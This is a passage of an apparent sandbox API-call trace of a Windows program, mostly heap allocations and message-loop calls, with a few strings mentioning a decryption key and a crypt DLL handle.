lpMem=0xe80eb0 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83400 | out: hHeap=0xc60000) returned 1 [0264.821] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83400 [0264.821] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80eb0 [0264.821] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833b8 [0264.821] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1690 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833b8 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80eb0 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16e0 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16b0 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb750 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83460 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835c8 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe810c0 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83610 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83640 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835f8 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81120 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe810f0 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83628 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83670 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83658 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81150 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83550 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f70 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834c0 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83478 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f40 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83490 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83448 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1720 | out: hHeap=0xc60000) returned 1 [0264.822] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1720 [0264.822] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1680 | out: hHeap=0xc60000) returned 1 [0264.822] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 1 [0264.822] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91f57c) returned 0 [0264.823] TranslateMessage (lpMsg=0x91f57c) returned 0 [0264.823] DispatchMessageW (lpMsg=0x91f57c) returned 0x0 [0264.823] GetForegroundWindow () returned 0x80170 [0264.823] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.823] GetCursorPos (in: lpPoint=0x91f3b8 | out: lpPoint=0x91f3b8*(x=890, y=510)) returned 1 [0264.823] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91f3b8 | out: lpPoint=0x91f3b8) returned 1 [0264.823] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xc9c540 [0264.823] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83448 [0264.823] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1680 [0264.823] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.823] GetAsyncKeyState (vKey=1) returned 0 [0264.823] GetAsyncKeyState (vKey=2) returned 0 [0264.823] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.823] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16b0 [0264.823] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca75a8 [0264.823] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16c0 [0264.823] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca75a8 | out: hHeap=0xc60000) returned 1 [0264.823] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.823] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.823] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.823] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca818 [0264.823] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16e0 [0264.823] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16e0 | out: hHeap=0xc60000) returned 1 [0264.823] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.823] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca818 | out: hHeap=0xc60000) returned 1 [0264.824] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.824] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16b0 | out: hHeap=0xc60000) returned 1 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1d60 [0264.824] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.824] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1d60 | out: hHeap=0xc60000) returned 1 [0264.824] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16b0 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.824] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.824] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16b0 | out: hHeap=0xc60000) returned 1 [0264.824] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16b0 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb750 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83490 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f40 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca818 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb778 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83478 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16e0 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834c0 [0264.824] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16e0 | out: hHeap=0xc60000) returned 1 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xd) returned 0xe80f70 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xe) returned 0xe834a8 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16e0 [0264.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Decryptionkey", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0264.824] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xe) returned 0xe83550 [0264.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Decryptionkey", cchWideChar=14, lpMultiByteStr=0xe83550, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Decryptionkey", lpUsedDefaultChar=0x0) returned 14 [0264.825] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83550 | out: hHeap=0xc60000) returned 1 [0264.825] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.825] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16e0 | out: hHeap=0xc60000) returned 1 [0264.825] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16e0 [0264.825] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834c0 | out: hHeap=0xc60000) returned 1 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f70 | out: hHeap=0xc60000) returned 1 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16e0 | out: hHeap=0xc60000) returned 1 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83478 | out: hHeap=0xc60000) returned 1 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb778 | out: hHeap=0xc60000) returned 1 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83478 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f70 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16e0 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16f0 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834c0 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f70 | out: hHeap=0xc60000) returned 1 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16e0 | out: hHeap=0xc60000) returned 1 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83478 | out: hHeap=0xc60000) returned 1 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83478 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834c0 | out: hHeap=0xc60000) returned 1 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83478 | out: hHeap=0xc60000) returned 1 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca818 | out: hHeap=0xc60000) returned 1 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xeca818 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16c0 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb778 [0264.826] CharLowerBuffW (in: lpsz="byte[13]", cchLength=0x8 | out: lpsz="byte[13]") returned 0x8 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xcbb940 [0264.826] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83478 [0264.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16d0 [0264.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834c0 [0264.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16e0 [0264.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f70 [0264.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1690 [0264.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834a8 [0264.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f70 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834c0 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16e0 | out: hHeap=0xc60000) returned 1 [0264.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16e0 [0264.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xd) returned 0xe834c0 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb778 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f40 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83490 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb750 | out: hHeap=0xc60000) returned 1 [0264.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16b0 | out: hHeap=0xc60000) returned 1 [0264.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xeca838 [0264.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xef3e68 [0264.828] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83490 [0264.828] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16b0 [0264.828] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83478 | out: hHeap=0xc60000) returned 1 [0264.828] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.828] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcbb940 | out: hHeap=0xc60000) returned 1 [0264.828] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca818 | out: hHeap=0xc60000) returned 1 [0264.828] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 1 [0264.828] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91f57c) returned 0 [0264.828] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91f57c) returned 1 [0264.829] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb750 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83478 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xeca818 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xcbb940 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f40 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16f0 [0264.829] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f70 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.829] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834a8 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83550 [0264.829] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.829] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xd) returned 0xe80fa0 [0264.830] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xe) returned 0xe81150 [0264.830] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16d0 [0264.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Decryptionkey", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0264.830] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xe) returned 0xe83658 [0264.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Decryptionkey", cchWideChar=14, lpMultiByteStr=0xe83658, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Decryptionkey", lpUsedDefaultChar=0x0) returned 14 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83658 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81150 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.830] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83550 | out: hHeap=0xc60000) returned 1 [0264.830] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.830] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xd) returned 0xe83550 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f40 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcbb940 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca818 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83478 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f70 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb750 | out: hHeap=0xc60000) returned 1 [0264.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83550 | out: hHeap=0xc60000) returned 1 [0264.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.831] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb750 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83550 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16f0 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.831] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe834a8 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.831] PeekMessageW (in: lpMsg=0x91ef14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91ef14) returned 0 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16f0 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1690 [0264.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834a8 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80fa0 [0264.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f70 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83478 [0264.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f40 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81150 [0264.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83658 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83670 [0264.832] 